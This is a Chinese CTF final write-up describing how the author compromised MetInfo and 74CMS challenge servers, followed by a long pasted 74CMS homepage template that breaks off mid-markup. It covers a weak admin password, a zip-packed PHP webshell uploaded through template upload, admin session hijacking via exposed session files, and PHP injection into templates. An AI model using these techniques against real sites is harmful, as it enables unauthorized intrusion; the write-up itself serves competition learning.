[2017世安杯] 决赛Writeup
今天折磨了一天感冒和头痛的身躯。。。。写完倒头就睡。。。。
今天决赛分为:
- 上午的综合渗透(个人更觉得是CTF)因为讲道理貌似三个题目服务器之间是互相不可达的。。。。。
- 下午的AWD(很不意外 还是只有一题)
上午的综合渗透是三个cms,分别是MetInfo 5.x、骑士CMS、还有一个easycms。。(版本号真的不记得了。。)
首先第一题MetInfo
- cookie处一个flag
- robots.txt处一个flag
- 弱密码admin —- MetInfo 进入后台
- 看到有个模版上传, 只允许上传zip等等,后缀限定得很死,发现他里面的模版都是以很多文件的形式存在,那么可以很合理的猜测他这里会有解压这一个操作,所以构造一个一句话,然后打包成zip上传模版,发现php被解压出来在templates目录下,getshell,直接上菜刀,这是一个windows的题,Orz这里就一开始有点难办了。。不太懂windows的命令。
- 在User目录下的flag4文件夹发现一个flag
- 在网站部署目录下的upload\file里看到一个flag
- 另外还有一个忘记在哪找的了。。。是一个名字为flag5.png的文件,hexdump后发现flag5
第二题骑士CMS
- 服务器设置不当导致部分目录遍历 (不存在index.php index.html的文件夹 具体apache配置项是Directory的Indexes)
- cookie处一个flag
- robots.txt处一个flag //貌似是
- 在遍历的时候发现了PHP的session储存点,翻看之后看到带有admin记录的session值,果断document.cookie=”PHPSESSID=xxx”伪造一波,成功登录后台
- 在后台处发现了模版编辑,是编辑htm文件,但是里面有很多类似于laravel的blade模版引擎的mustache写法,也就是
{{ }}
之类的,猜测这里是可以直接加入php执行的,直接加入<?php phpinfo();?>
成功执行,然后就开始getshell翻翻翻flag了 - apache运行用户叫apache
- 首先在网站部署根目录下发现一个AAAAAAAAflag.txt文件得到一个flag
- 其次在服务器根目录下有一个/flag文件夹,虽然是被设置成了700,但是owner是apache,直接chmod 777 后进入目录查看.flag.txt文件得到一个flag
- 最后执行find / -name flag的时候在/var/lib/mysql/处发现了有一个flag文件夹,这次owner是mysql并没有读权限,cat /etc/group 的时候发现mysql是单独一个组的,这里想到了提权。。。但是没有怎么操作过。。。所以放弃了
附上一部分模版源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />{#qishi_pageinfo set="列表名:page,调用:QS_index"#}
<title>Welcome 74CMS</title>
<meta name="description" content="{#$page.description#}">
<meta name="keywords" content="{#$page.keywords#}">
<meta http-equiv="X-UA-Compatible" content="edge">
<link rel="shortcut icon" href="{#$QISHI.site_dir#}favicon.ico" />
<meta name="author" content="骑士CMS" />
<meta name="copyright" content="74cms.com" />
<link href="{#$QISHI.site_template#}css/common.css" rel="stylesheet" type="text/css" />
<link href="{#$QISHI.site_template#}css/index.css" rel="stylesheet" type="text/css" />
<script src="{#$QISHI.site_template#}js/jquery.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/index_foucs.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.dropDownWidget.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.newindex.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.lazyload.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.autocomplete.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_dir#}data/cache_classify.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
//选项卡切换
$(".n-tab-control>a").each(function(){
$(this).click(function(){
$(this).addClass("select");
$(this).siblings("a").removeClass("select");
var bull_index = $(".n-tab-control>a").index(this);
$(".news-tab-box>ul").eq(bull_index).show().siblings().hide();
})
});
//登录
$.get('{#$QISHI.site_dir#}plus/ajax_user.php?act=loginform', function(data) {
$("#ajax_login").html(data);
// 选择登录方式
var wxrun = '';
$('.loginicon').toggle(function(){
$('#pcLogin').hide();
$('#codeLogin').show();
$('#login-box h1').html('微信登录');
$(this).attr('title', '用户名登录');
$(this).removeClass('wx').addClass('pc');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
wxrun = window.setInterval(run, 5000);
function run(){
$.get("{#$QISHI.site_dir#}m/login.php?act=waiting_weixin_login",function(data){
if(data=="1"){
window.location="{#$QISHI.site_dir#}";
}
});
}
{#/if#}
}, function(){
$('#pcLogin').show();
$('#codeLogin').hide();
$('#login-box h1').html('会员登录');
$(this).attr('title', '微信登录');
$(this).removeClass('pc').addClass('wx');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
window.clearInterval(wxrun);
{#/if#}
});
});
// 左侧下拉
$.dropDownWidget(".job-sort-wrap");
// 首页的一些js
index("{#$QISHI.site_dir#}","{#$QISHI.site_template#}");
// 工作地区填充数据
city_filldata("#city_list", QS_city_parent, QS_city, "#result-list-city", "#aui_outer_city", "#cityForIndexSearch", "#citycategory");
//
$('.floor-item:first').find('.floor-title').css({'margin-top':5});
$(".core-function").live('click', function(event) {
window.location.href = $(this).attr("code");
});
});
</script>
</head>
<body {#if $QISHI.body_bgimg#}style="background:url({#$QISHI.site_domain#}{#$QISHI.site_dir#}data/{#$QISHI.updir_images#}/{#$QISHI.body_bgimg#}) repeat-x center 38px;"{#/if#}>
{#include file="header.htm"#}
<!-- 主体 -->
<div class="container-index">
<div class="complex-main clearfix">
<div class="complex-left f-left">
<div class="job-sort-wrap">
<div class="job-sort-control">全部职位分类<i class="sotr-icon"></i></div>
<div class="job-sort-list"></div>
<div class="leftmenu_box"></div>
</div>
<div class="bolck-nav clearfix">
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}jobs" target="_blank">
<i class="b-nav-icon icon1"></i>
<p>找工作</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}resume" target="_blank">
<i class="b-nav-icon icon2"></i>
<p>找人才</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/company/company_jobs.php?act=addjobs" target="_blank">
<i class="b-nav-icon icon9"></i>
<p>发职位</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/personal/personal_resume.php?act=make1" target="_blank">
<i class="b-nav-icon icon4"></i>
<p>创简历</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_simplelist"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon5"></i>
<p>微商圈</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_hrtoolsindex"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon6"></i>
<p>HR工具</p>
</a>
</div>
<div class="news-tab">
<div class="n-tab-control clearfix">
<a href="javascript:;" class="f-left tab-ctrl select">公告</a>
<a href="javascript:;" class="f-left tab-ctrl">资讯</a>
<a href="javascript:;" class="f-left tab-ctrl">帮助</a>
</div>
<div class="news-tab-box">
<!-- 公告 -->
<ul>
{#qishi_notice_list set="列表名:notice,显示数目:9,标题长度:12,分类:1,填补字符:..."#}
{#foreach from=$notice item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 资讯 -->
<ul style="display: none;">
{#qishi_news_list set="列表名:news,显示数目:9,标题长度:12,分类:1,填补字符:...,排序:id>desc"#}
{#foreach from=$news item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 帮助 -->
<ul style="display: none;">
{#qishi_help_list set="列表名:help,显示数目:9,标题长度:12,填补字符:..."#}
{#foreach from=$help item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<div class="complex-center f-left">
<!-- 搜索 -->
<div class="search-wrap clearfix">
<div class="search-box f-left">
<div class="search-type f-left">
<div title="找工作" code="QS_jobslist" data="请输入职位名称或企业名称" class="search-type-show"><span>找工作</span><i class="search-icon"></i></div>
<div title="找人才" code="QS_resumelist" data="请输入简历关键字" class="search-type-drop"><a href="javascript:;">找人才</a></div>
</div>
<div class="search-text f-left">
<input type="text" name="keyForIndexSearch" id="keyForIndexSearch" placeholder="请输入职位名称或企业名称" />
</div>
</div>
<div class="search-box f-left">
<div class="search-area-box"><input type="text" name="cityForIndexSearch" id="cityForIndexSearch" placeholder="请输入工作地区" /></div>
</div>
<div class="search-submit f-left"><input type="button" name="btnForIndexSearch" id="btnForIndexSearch" code="QS_jobslist" value="搜索" class="search-submit" /></div>
<input type="hidden" name="citycategory" id="citycategory" value="">
<!-- 工作地区弹出框 -->
<div class="aui_outer" id="aui_outer_city">
<table class="aui_border">
<tbody>
<tr>
<td class="aui_c">
<div class="aui_inner">
<table class="aui_dialog">
<tbody>
<tr>
<td class="aui_main">
<div class="aui_content" style="padding: 0px;">
<div class="LocalDataMultiC" style="width:623px;">
<div class="selector-header"><span class="selector-title">选择地区</span><div></div><span id="ct-selector-save" class="selector-save">确定</span><span class="selector-close">X</span><div class="clear"></div></div>
<div class="data-row-head"><div class="data-row"><div class="data-row-side data-row-side-c">最多选 <strong class="text-warning">3</strong> 项 已选 <strong id="arscity" class="text-warning">0</strong> 项</div><div id="result-list-city" class="result-list data-row-side-ra"></div></div><div class="cla"></div></div>
<div class="data-row-list data-row-main" id="city_list">
<!-- 列表内容 -->
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- 工作地区弹出框 End-->
</div>
<!-- 搜索结束 -->
<div class="swipe-wrap">
{#qishi_ad set="显示数目:6,调用名称:QS_indexfocus,列表名:ad"#}
<div id="playBox">
<div class="pre"></div>
<div class="next"></div>
<div class="smalltitle">
<ul>
{#section loop=$ad name=list#}
<li {#if $smarty.section.list.first#}class="thistitle"{#/if#}></li>
{#/section#}
</ul>
</div>
<ul class="oUlplay">
{#foreach from=$ad item=list#}
<li><a href="{#$list.img_url#}" target="_blank">![]({#$list.img_path#})</a></li>
{#/foreach#}
</ul>
</div>
</div>
<div class="block-ad-wrap clearfix lazyload">
{#qishi_ad set="显示数目:6,调用名称:QS_indexrecommend,列表名:ad"#}
{#if $ad#}
{#foreach from=$ad item=list#}
{#if $list.img_uid>0#}
<div class="block-ad-item f-left">
<div class="block-ad-logo"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
<div class="block-ad-info">
<h3><a href="{#$list.company_url#}" target="_blank">{#$list.companyname#}</a></h3>
<p><a href="{#$list.jobs.0.jobs_url#}" target="_blank">{#$list.jobs.0.jobs_name#}</a></p>
</div>
</div>
{#else#}
<div class="block-ad-item f-left">
<a href="{#$list.img_url#}" target="_blank">
![]({#$QISHI.site_template#}images/index/84.jpg)
</a>
</div>
{#/if#}
{#/foreach#}
{#/if#}
</div>
</div>
<div class="complex-right f-left">
<div class="login-block" id="ajax_login">
<h4>会员登录</h4>
<div class="login-wrap">
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon user f-left"></i><div class="login-input f-left"><input type="text" name="" id="" placeholder="邮箱/手机号/用户名" /></div></div>
</div>
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon pass f-left"></i><div class="login-input f-left"><input type="password" name="" id="" placeholder="请输入密码" /></div></div>
</div>
<div class="login-item clearfix">
<label class="auto-login f-left"><input type="checkbox" name="" id="" />自动登录</label>
<a href="" class="forget underline f-right">忘记密码?</a>
</div>
<div class="login-item clearfix">
<div class="login-btn-box f-left"><input type="button" value="立即登录" class="index-login-btn" /></div>
<div class="f-left"><input type="button" value="免费注册" class="index-reg-btn" /></div>
</div>
<div class="third-login clearfix">
<span class="f-left">其他账户登录:</span>
<a href="" class="third-icon qq f-left"></a><a href="" class="third-icon sina f-left"></a><a href="" class="third-icon taobao f-left"></a>
</div>
</div>
</div>
<div class="urgent-block" id="emergencybox">
<div class="urgent-title clearfix">
<h4 class="f-left">紧急招聘</h4>
<a href="{#"QS_jobs"|qishi_url#}" class="underline f-right" target="_blank">更多>></a>
</div>
<ul class="urgent-list">
{#qishi_jobs_list set="列表名:jobs,显示数目:10,职位名长度:12,企业名长度:12,紧急招聘:1,排序:refreshtime>desc"#}
{#foreach from=$jobs item=list#}
<li class="clearfix"><a href="{#$list.company_url#}" class="u-com f-left underline" target="_blank">{#$list.companyname#}</a><a href="{#$list.jobs_url#}" class="u-job f-left underline" title="{#$list.jobs_name_#}" target="_blank">{#$list.jobs_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<!-- 广告位集中区域 -->
<div class="ad-area">
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indextopimg,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
{#/if#}
<!-- 392*58 广告 格子广告-->
{#qishi_ad set="显示数目:6,调用名称:QS_indexcentreimg,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-row clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-31 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a>
{#if $list.jobs#}
<!-- 鼠标至上显示 -->
<div class="ad-more-info info31" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div><div class="jobnarea f-left">{#$jobs_li.district_cn#}</div></li>
{#/foreach#}
</ul>
<div class="ad-com-info">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多内容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 230x58 广告 格子广告-->
{#qishi_ad set="显示数目:10,调用名称:QS_indexcentreimg_230x58,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-row a23058d clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-51 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a>
{#if $list.jobs#}
<!-- 鼠标至上显示 -->
<div class="ad-more-info info51" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div></li>
{#/foreach#}
</ul>
<div class="ad-com-info ad-com-info-w">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多内容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
</div>
<!-- 广告位集中区域结束 -->
<!-- 列表-推荐职位 -->
<div class="index-data-wrap index-data-wrap-i7">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">推荐职位<span>Recommended Job</span></h4>
<a href="{#"QS_helplist,id:10"|qishi_url#}" class="f-right underline" target="_blank">我是招聘单位,我想出现在这里</a>
</div>
<div class="famous-list clearfix">
{#qishi_companyjobs_list set="列表名:comjob_recommend,显示数目:12,显示职位:3,推荐:1,统计职位:1"#}
{#foreach from=$comjob_recommend item=list#}
<div class="famous-items f-left">
<i class="fc-icon"></i>
<div class="famous-com comtip">
<a href="{#$list.company_url#}" class="underline" target="_balnk">{#$list.companyname#}{#if $QISHI.operation_mode>="2" && $list.setmeal_id>1 #} ![]({#$QISHI.site_dir#}data/setmealimg/{#$list.setmeal_id#}.gif){#/if#}</a>
<div class="famous-more-info" style="display:none;">
<i class="fmi-icon"></i>
<div class="fmi-title">招聘岗位</div>
<ul class="fmi-list">
{#qishi_jobs_list set="列表名:com_jobs_all,显示数目:3,会员UID:$list.uid"#}
{#foreach from=$com_jobs_all item=job_li#}
<li class="clearfix">
<div class="fmi-jobname f-left"><a href="{#$job_li.jobs_url#}" class="underline" target="_balnk">{#$job_li.jobs_name#}</a></div><div class="fmi-time f-left"><span>{#$job_li.refreshtime_cn#}</span></div>
</li>
{#/foreach#}
</ul>
<p>该企业共有{#$list.jobs_num#}个职位,<a href="{#"QS_companyjobs,id:$list.company_id"|qishi_url#}" target="_balnk" class="underline">查看全部</a></p>
</div>
</div>
<div class="famous-job">
{#foreach from=$list.jobs item=jobs_li#}
<span><a href="{#$jobs_li.jobs_url#}" class="underline" target="_balnk">{#$jobs_li.jobs_name#}</a></span>
{#/foreach#}
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-名企招聘结束 -->
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indexcenter,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-最新职位 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">最新职位<span>Latest Job</span></h4>
<a href="{#"QS_jobslist"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="newest-list clearfix">
{#qishi_companyjobs_list set="列表名:jobs,显示数目:40,职位名长度:12,显示职位:1,企业名长度:12,排序:rtime>desc"#}
{#foreach from=$jobs item=list#}
<div class="newest-items f-left">
<i class="nc-icon"></i>
<a href="{#$list.company_url#}" class="newest-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="newest-job underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-最新职位结束 -->
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indexfootbanner,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-照片简历 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">照片简历<span>Photo Resume</span></h4>
<a href="{#"QS_resumelist,photo:1"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="photo-list clearfix">
{#qishi_resume_list set="列表名:resume,显示数目:7,照片:1,意向职位长度:14,填补字符:...,排序:rtime>desc"#}
{#foreach from=$resume item=list#}
<div class="photo-items f-left">
<div class="avater-box">
<div class="avater"><a href="{#$list.resume_url#}" target="_blank">![]({#$list.photosrc#})</a></div>
<p><a href="{#$list.resume_url#}" target="_blank" class="underline">{#$list.fullname#}</a></p>
</div>
<div class="photo-info">
<p>{#$list.education_cn#},{#$list.experience_cn#}</p>
<p>{#$list.intention_jobs#}</p>
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-照片简历结束 -->
<!-- 列表-职位导航 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">职位导航<span>Jobs Navigation</span></h4>
</div>
<div class="job-build">
<!-- 楼层1 -->
<div class="floor-item">
<div class="floor-title"><em>1F</em><span>{#"QS_jobs,76"|qishi_categoryname#} · {#"QS_jobs,77"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:76_77"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:74|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:76_77"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img1,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 2 -->
<div class="floor-item">
<div class="floor-title"><em>2F</em><span>{#"QS_jobs,3"|qishi_categoryname#} · {#"QS_jobs,5"|qishi_categoryname#} · {#"QS_jobs,6"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:3_5_6"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:1|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:3_5_6"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img2,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 3 -->
<div class="floor-item">
<div class="floor-title"><em>3F</em><span>{#"QS_jobs,117"|qishi_categoryname#} · {#"QS_jobs,120"|qishi_categoryname#} · {#"QS_jobs,121"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:117_120_121"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:116|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:117_120_121"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img3,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 4 -->
<div class="floor-item">
<div class="floor-title"><em>4F</em><span>{#"QS_jobs,97"|qishi_categoryname#} · {#"QS_jobs,98"|qishi_categoryname#} · {#"QS_jobs,99"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:97_98_99"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:96|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:97_98_99"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img4,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 5 -->
<div class="floor-item">
<div class="floor-title"><em>5F</em><span>{#"QS_jobs,50"|qishi_categoryname#} · {#"QS_jobs,51"|qishi_categoryname#} · {#"QS_jobs,52"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:50_51_52"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:49|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:50_51_52"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img5,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank">![]({#$QISHI.site_template#}images/index/84.gif)</a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
</div>
</div>
<!-- 列表-职位导航结束 -->
<!-- 列表-职场资讯 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">职场资讯<span>Workplace Information</span></h4>
<a href="{#"QS_news"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="job-news-block clearfix">
<div class="jn-left f-left">
{#qishi_news_category set="列表名:newscategory,资讯大类:1,显示数目:4"#}
{#section loop=$newscategory name=nclist#}
<div class="jn-box f-left">
<div class="jn-img f-left"><a href="{#"QS_newslist,id:$newscategory[nclist].id"|qishi_url#}" target="_blank">![]({#$QISHI.site_template#}images/news{#$smarty.section.nclist.index#}.jpg)</a></div>
<ul class="jn-list f-left">
{#qishi_news_list set="列表名:topnews,显示数目:4,标题长度:18,资讯小类:$newscategory[nclist].id,摘要长度:36,填补字符:...,排序:id>desc"#}
{#foreach from=$topnews item=toplist#}
<li><i class="jn-icon"></i><a target="_blank" href="{#$toplist.url#}" class="underline" title="{#$toplist.title_#}" target="_blank">{#$toplist.title#}</a></li>
{#/foreach#}
</ul>
</div>
{#/section#}
</div>
<ol class="jn-right f-left">
{#qishi_news_list set="列表名:news_list,显示数目:8,标题长度:12,填补字符:...,排序:click>desc"#}
{#section loop=$news_list name=nclist start=1#}
<li><span>{#$smarty.section.nclist.index#}</span><a href="{#$news_list[nclist].url#}" class="underline" target="_blank">{#$news_list[nclist].title#}</a></li>
{#/section#}
</ol>
</div>
</div>
<!-- 列表-职场资讯结束 -->
<!-- 列表-友情链接 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">友情链接<span>Friendly Link</span></h4>
<a href="{#$QISHI.site_dir#}link/add_link.php" target="_blank" class="f-right underline">申请>></a>
</div>
<div class="friendly-link">
